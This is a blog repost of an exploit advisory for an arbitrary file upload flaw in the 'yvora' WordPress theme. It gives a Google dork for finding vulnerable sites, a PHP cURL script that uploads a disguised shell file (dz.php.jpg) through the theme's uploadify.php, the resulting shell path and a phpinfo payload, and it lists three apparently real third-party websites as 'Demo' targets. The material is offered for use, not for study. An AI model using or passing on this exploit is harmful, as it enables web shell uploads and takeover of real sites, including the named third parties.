J2TEAM Security: A must-have extension for Chrome users. Install now!

Wordpress Themes - yvora Arbitrary File Upload Vulnerability

Wordpress Themes - yvora Arbitrary File Upload Vulnerability | Juno_okyo's Blog
-------------------------------------------------------------------------------
Wordpress Themes- yvora Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/yvora"
#
#######################################################################################


Exploit  : uploadshell.php.jpg or .gif


Quote
<?php

$uploadfile="dz.php.jpg";

$ch = curl_init("http://www.localhost...y/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.localhost...stom_dz.php.jpg

Quote

<?php
phpinfo();
?>
---------------------------------------------------------------------------------------

Demo :

1) http://askyvi.com/wp...y/uploadify.php

2) http://epeknights.co...y/uploadify.php

3) http://www.ben2bath....y/uploadify.php

-----------------------------------------------------------------------------------------
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!